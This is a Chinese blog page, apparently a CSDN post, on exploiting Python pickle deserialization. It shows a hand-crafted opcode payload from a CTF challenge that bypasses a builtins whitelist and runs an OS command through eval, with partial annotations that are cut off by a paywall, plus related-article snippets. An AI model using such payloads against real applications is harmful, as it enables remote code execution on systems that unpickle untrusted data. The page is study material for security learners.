python pickle反序列化漏洞_python pickle从零构造反序列化攻击利用

最新推荐文章于 2024-03-25 09:22:09 发布
最新推荐文章于 2024-03-25 09:22:09 发布
阅读量162 收藏
点赞数
文章标签: python pickle反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39743414/article/details/111452353
版权

有一篇很好的文章对此讲的很详细

https://xz.aliyun.com/t/7436#toc-0

此外我对文章中的手写反序列化一块进行一些补充

几道例题Code-Breaking:picklecode

原payload:b'''cbuiltins

getattr

p0

(cbuiltins

dict

S'get'

tRp1

cbuiltins

globals

)Rp2

00g1

(g2

S'builtins'

tRp3

0g0

(g3

S'eval'

tR(S'__import__("os").system("whoami")'

tR.

'''(建议复制到python去看)

首先要声明的一点是反序列化的利用栈是从底端往上的,清楚汇编的同学应该了解这一点

我的注解

b'''白名单REC

cbuiltins #import

getattr  #获取builtins白名单方法getattr

p0  #将getattr压入mem0,字典保存

(cbuiltins    mark元素c模块builtins方法dict压栈

dict

S'get'  声明元素字符串'get'

tRp1

# 创建元组(builtins.dict,'get')调用getat

最低0.47元/天 解锁文章
weixin_39743414
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python Pickle反序列化漏洞
Lemon's blog
11-15 4561
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点是Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
反序列化攻击详细解释
Ba1_Ma0的博客
04-28 5641
简介 详细的记录学习过程中的笔记,可以加我qq一起交流:3316735898 什么是序列化与反序列化 举一个例子,当你在玩游戏时,你正在操作的角色看起来如下 但反序列化后看起来就像这样 Vincent = { "type": "player" "health": 100, "position":{ "x": 31337, "y":13.37, "z":4444 } } 这些只是一个充满值的对象,但当你关闭游戏时,这些值存储在电脑的RAM上,然后就永远消失了 如果想要把这些东西保存下来,ob
PythonPickle/PyTorch反序列化漏洞
兴趣使然的创作者
02-28 1265
一个漏洞
python pickle反序列化漏洞
weixin_43610673的博客
05-20 3006
前置知识 什么是pickle picklePython专用的一个进行序列化和反序列化的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列化或者JSON,这些以键值对形式存储序列化对象数据的不同,pickle 序列化(Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久化储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
pickle反序列化漏洞基础知识与绕过简析
最新发布
yj520400的博客
03-25 951
的结合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象).其中两个dump函数是把python对象转换为二进制对象的,两个load函数是把二进制对象转换为python对象的.在Python中,面向对象的思想和php是一致的,只是定义类的代码,调用类函数和类属性的方式和php不同.方法且该方法返回一个迭代器对象,那么这个对象就被认为是可迭代的。语言.也就是说在Python中几乎一切皆为对象.这也为我们的绕过提供的不小的便利.
Python Pickle 反序列化漏洞
qq_46001025的博客
10-05 238
需要注意的一点:注意:对于我们自己定义的class,如果直接以 data=‘aaa’ 的方式赋初值,则这个date不会被打包,解决方案是写一个__init__()方法。python反序列化漏洞的产生和php的魔术方法有异曲同工之处,在Python2中的 __reduce__() 方法,会在每次的反序列化开始或结束时调用。字节码,如果python有写入的权限,那么会生成一个 .pyc 的字节码文件,若没有那就再内存中生成字节码,程序结束后丢弃。(以下称为机器吧)维护了两个东西:栈区和存储区。
python反序列化漏洞 任意代码执行
01-20
这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
Python3.5 Json与pickle实现数据序列化与反序列化操作示例
09-19
Pickle序列化的数据格式是Python特有的,不能跨语言使用。 - 序列化:`pickle.dumps()`用于将Python对象转化为二进制数据,可以写入文件: ```python import pickle def sayhi(name): print("hello", name) info...
Python使用pickle进行序列化和反序列化的示例代码
12-16
但需要注意的是,pickle序列化的数据不是跨语言兼容的,它主要用于Python内部。此外,由于pickle可以执行任意代码,处理不信任的数据时应谨慎,以防止潜在的安全风险。在实际项目中,更安全的选择可能是使用如JSON或...
Python中shelve序列化与反序列化
12-22
序列化/反序列化 将对象转换为可通过网络传输或可以存储到本地磁盘的数据格式(如:XML、JSON或特定格式的字节串)的过程称为序列化;之,则称为反序列化 shelve shelve是一个简单的数据存储方案,类似key-value...
详解Python中的序列化与反序列化的使用
09-21
- `pickle.loads(string)`:从字节字符串`string`中反序列化Python对象。 此外,pickle模块还提供了一个类`pickle.Pickler(file[, protocol])`用于自定义序列化过程。`Pickler`实例有自己的方法`dump(obj)`来序列...
高校战“疫”网络安全分享赛 —— Write-up
a3320315的博客
03-30 2340
Guessgame 这道题目当时没做出来,后来复现的时候,发现挺有意思的,题目中主要有三个考点 JS的大小写特征 原型链污染 redos盲注 这儿主要着重介绍一下第三个考点 JS的 exec test RegExp match replace spite可以造成redos盲注 /([a-z]+)+$/.exec('aaaaaaaaaaaaaaaaaaaaaaaaaaaa!'); /Runoo...
高校战疫网络安全分享赛: webtmp
qq_46263951的博客
01-17 2804
源码 打开后的页面 点击here可以看到源码,关键处代码 当满足Animal类中对象的name和category属性和secret内的两个属性的值吻合即可getflag 这里还限制了‘R',并且RestrictedUnpickler函数使得我们只能使用mian中模块。 所以可以导入secret然后再覆盖secret变量的值 手写opcode有些困难,所以利用pker工具 pker代码放到1.txt中 secret=GLOBAL('__main__', 'secret') # python.
网络安全-反序列化漏洞简介、攻击与防御
热门推荐
关注网络安全、云原生安全
03-13 1万+
目录 简介 PHP序列化 Python序列化 攻击 PHP举例 Python举例 防御 参考 简介 各种语言都有反序列化漏洞,Java、PHP、Python等。序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转化为对象,也就是序列化的逆过程。 PHP序列化 php中序列化和反序列化函数为serialize、unserialize。 我们尝试对一些类型进行序列化 <?php // 字符串类型 $s = "a string"; $serializ
关于Pickle反序列化总结
桃雾雨Rain的博客
01-18 1888
1.Pickle反序列化 (1)pickle.dump(obj,file[,protocol]) 序列化对象,并将结果数据流写入到文件对象中,protocol可选择模式,默认为0,文本形式序列化,还可以是1或2,二进制形式序列化。 注:pickle.dumps()将对象obj对象序列化并返回一个byte对象 (2)pickle.load(file) 反序列化对象。注意要让python找到类的定义,否则报错。 注:pickle.loads(),从字节对象中读取被封装的对象 简单示例:...
python安全之Pickle反序列化漏洞学习。
Mrs_H的博客
10-28 1947
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
Python pickle 反序列化详解
m0_65129142的博客
12-16 2973
什么是Python反序列化 python反序列化和php反序列化类似(还没接触过java。。),相当于把程序运行时产生的变量,字典,对象实例等变换成字符串形式存储起来,以便后续调用,恢复保存前的状态 python反序列化的库主要有两个,pickle和cPickle,这俩除了运行效率上有区别外,其他没啥区别 pickle的常用方法有 import pickle a_list = [‘a’,‘b’,‘c’] pickle构造出的字符串,有很多个版本。在dumps或loads时,可以用Protocol参数指定协
Python之序列化与反序列化pickle反序列化篇上)
errorr0
05-16 1007
浅谈Python反序列化原理
BUUCTF pickle反序列化漏洞
09-07
BUUCTF中的Pickle反序列化漏洞是指在该比赛的题目中存在通过反序列化攻击来执行任意代码的漏洞。具体来说,这个漏洞利用Python中的pickle模块,pickle模块可以将对象序列化为字符串并保存到文件或通过网络传输。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值